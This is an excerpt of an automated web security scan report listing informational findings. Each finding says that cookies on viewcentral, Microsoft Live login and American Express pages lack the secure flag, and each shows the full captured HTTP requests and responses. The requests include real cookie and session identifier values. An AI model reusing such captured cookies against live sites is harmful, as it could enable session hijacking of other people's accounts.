...IHDR.............L"......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.OTg.?..0(.C...6EIK..6......6.e..A.ug....&.Z...\...[LkH.T..G.T+.._<.a..y.....|....!....d.......s~..]..-K..j...C6....={
...[SNIP]...

11.44. https://inter.viewcentral.com/events/uploads/arcsight/catalog_partner.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/catalog_partner.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/catalog_partner.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 1602
Content-Type: image/png
Last-Modified: Wed, 28 Apr 2010 20:38:28 GMT
Accept-Ranges: bytes
ETag: "2da6fcc112e7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
...IHDR.............L"......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.OTW.>..0 .!.".V1-i....;V.....M..M..Fw.;M...4]...I.....)t.h..Xa$.B....a~.y......ufx..f.......s...;.9....4......Y..9#G.
...[SNIP]...

11.45. https://inter.viewcentral.com/events/uploads/arcsight/cbt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/cbt.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/cbt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4679
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:27:17 GMT
Accept-Ranges: bytes
ETag: "ba58a1ac38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#....IDATx....o\.}..s...3...3.R.e..-+Fe7Hb').6E.@.C..u...0...!h..    .....@..M.".[..5]..V......DI.)q........p(.6c.r..#..~.9..m..!|*.....|*.."...../..........7.7.Ro....O<.
...[SNIP]...

11.46. https://inter.viewcentral.com/events/uploads/arcsight/cellBg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/cellBg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/cellBg.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 266
Content-Type: image/gif
Last-Modified: Mon, 10 May 2010 23:50:48 GMT
Accept-Ranges: bytes
ETag: "e9b7c9d9bf0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

GIF89a..6...............................................................................................................................................................................................
...[SNIP]...

11.47. https://inter.viewcentral.com/events/uploads/arcsight/cellBg2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/cellBg2.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/cellBg2.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 264
Content-Type: image/gif
Last-Modified: Thu, 22 Apr 2010 16:27:29 GMT
Accept-Ranges: bytes
ETag: "28c2b7b338e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

GIF89a..(...............................................................................................................................................................................................
...[SNIP]...

11.48. https://inter.viewcentral.com/events/uploads/arcsight/esm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/esm.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/esm.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 715
Content-Type: image/png
Last-Modified: Wed, 19 May 2010 23:05:00 GMT
Accept-Ranges: bytes
ETag: "e7d51b5a7f7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR.............,.......tEXtSoftware.Adobe ImageReadyq.e<...mIDATx..W... ..P.`K.JpJ...d..+..!)!)!V*X.......p........;.(!.?.7..?N......U/X.U...*.........6.6d...U'.E....g.'.$.....(G.F.Ga.j.
...[SNIP]...

11.49. https://inter.viewcentral.com/events/uploads/arcsight/greybar.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/greybar.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/greybar.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 359
Content-Type: image/png
Last-Modified: Thu, 08 Apr 2010 17:50:40 GMT
Accept-Ranges: bytes
ETag: "b64d95044d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
...IHDR.............b......    pHYs..........+......tIME.....2./n.a....tEXtAuthor....H....tEXtDescription..    !#...
tEXtCopyright....:....tEXtCreation time.5..    ...    tEXtSoftware.]p.:....tEXtDisclai
...[SNIP]...

11.50. https://inter.viewcentral.com/events/uploads/arcsight/icon_new.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/icon_new.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/icon_new.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 2031
Content-Type: image/png
Last-Modified: Thu, 06 Jan 2011 01:20:31 GMT
Accept-Ranges: bytes
ETag: "4467c6e83fadcb1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR...6..........+......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.51. https://inter.viewcentral.com/events/uploads/arcsight/ilt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/ilt.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/ilt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 5786
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:27:56 GMT
Accept-Ranges: bytes
ETag: "fce4b7c338e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#...aIDATx...[........]U}......3....D.^JYH.5l....x.v.H....N.<..$y.K. A^d./..'/I@X..z.u......6)..I.9W...vO......9'.]U..3.H......vsX.:.W..;.....W.+..}.F>.x....z..e2....,
...[SNIP]...

11.52. https://inter.viewcentral.com/events/uploads/arcsight/logger.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/logger.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/logger.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 826
Content-Type: image/png
Last-Modified: Wed, 19 May 2010 23:05:12 GMT
Accept-Ranges: bytes
ETag: "342425bca7f7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR.............,.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.r.0.U.-..1.<.2....]|'...O.?...k..}..v..l..-Z;V.{.=..h.w.D4    >......l2.z.b...f...!.9.Q*H    ..~...Q........r.Q..".....^...
...[SNIP]...

11.53. https://inter.viewcentral.com/events/uploads/arcsight/red.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/red.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/red.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 3802
Content-Type: image/png
Last-Modified: Thu, 22 Apr 2010 16:28:31 GMT
Accept-Ranges: bytes
ETag: "429ab3d838e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

11.54. https://inter.viewcentral.com/events/uploads/arcsight/topbgfill.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/topbgfill.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/topbgfill.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 181
Content-Type: image/gif
Last-Modified: Thu, 22 Apr 2010 16:28:39 GMT
Accept-Ranges: bytes
ETag: "76a486dd38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

GIF89a..K....................................................................................................!.......,......K...2.&.bQ4AX.e..r.Y]Ox.WTO    ......1.....H.
..B.$"X.c...;

11.55. https://inter.viewcentral.com/events/uploads/arcsight/vlt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/vlt.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/vlt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4135
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:29:07 GMT
Accept-Ranges: bytes
ETag: "905d3eee38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#....IDATx.......u..{oU.{.......p(>dK4hQ..v..~"..]. .'{#.,.7dc..B.[...<.....#K.EJ6..lqf(.Cq....p.....{o.U=.|...=......~U.....{...O....>.O.........2.E....ZJ..\9}........
...[SNIP]...

11.56. https://inter.viewcentral.com/events/uploads/arcsight/wbt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/wbt.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/wbt.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4506
Content-Type: image/png
Last-Modified: Thu, 22 Apr 2010 16:29:17 GMT
Accept-Ranges: bytes
ETag: "1438e3f338e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#...aIDATx....o..}.?...}...]$EJ...c$.....r.<$...HP4@..T.....}H...(
..m.....H.8u-5Ic.....u.EQ...%w....\.9}...J..DK.z.....p..9...~..;s..o.h...2..w.}7...2.tZ..u..m...s..B.
...[SNIP]...

11.57. https://inter.viewcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 13736
Content-Type: image/x-icon
Last-Modified: Wed, 15 Feb 2006 18:12:59 GMT
Accept-Ranges: bytes
ETag: "f480e6735b32c61:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:28:26 GMT

8BPS............................-.8BIM................8BIM.%......F...&.V........w8BIM.$......<?xpacket begin='...' id='W5M0MpCehiHzreSzNTczkc9d'?>
<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='XMP too
...[SNIP]...

11.58. https://inter.viewcentral.com/reg/arcsight/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /reg/arcsight/home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg/arcsight/home HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Redirect
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 190
Content-Type: text/html
Location: http://inter.viewcentral.com/events/redir/redir.aspx?/arcsight/home
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:28:10 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://inter.viewcentral.com/events/redir/redir.aspx?/arcsight/home">here</a></body>

11.59. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1303660392&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; wla42=; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14318
Content-Type: text/html; charset=utf-8
Expires: Sun, 24 Apr 2011 15:52:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1303660423&co=1&id=265631; path=/;version=1
Set-Cookie: MSPOK=$uuid-18b94e66-b7b0-49aa-b234-106cb7e83e44; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1Q57 V: 0
Date: Sun, 24 Apr 2011 15:53:43 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1Q57 2011.03.07.16.56.24 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA080, -- Version: 10,0,17133,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

11.60. https://online.americanexpress.com/myca/acctsumm/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/acctsumm/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&us_nu=logincontrol&inav=menu_myacct_acctsum HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=655231498.58148.0000

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:50:13 GMT
Server: IBM_HTTP_Server
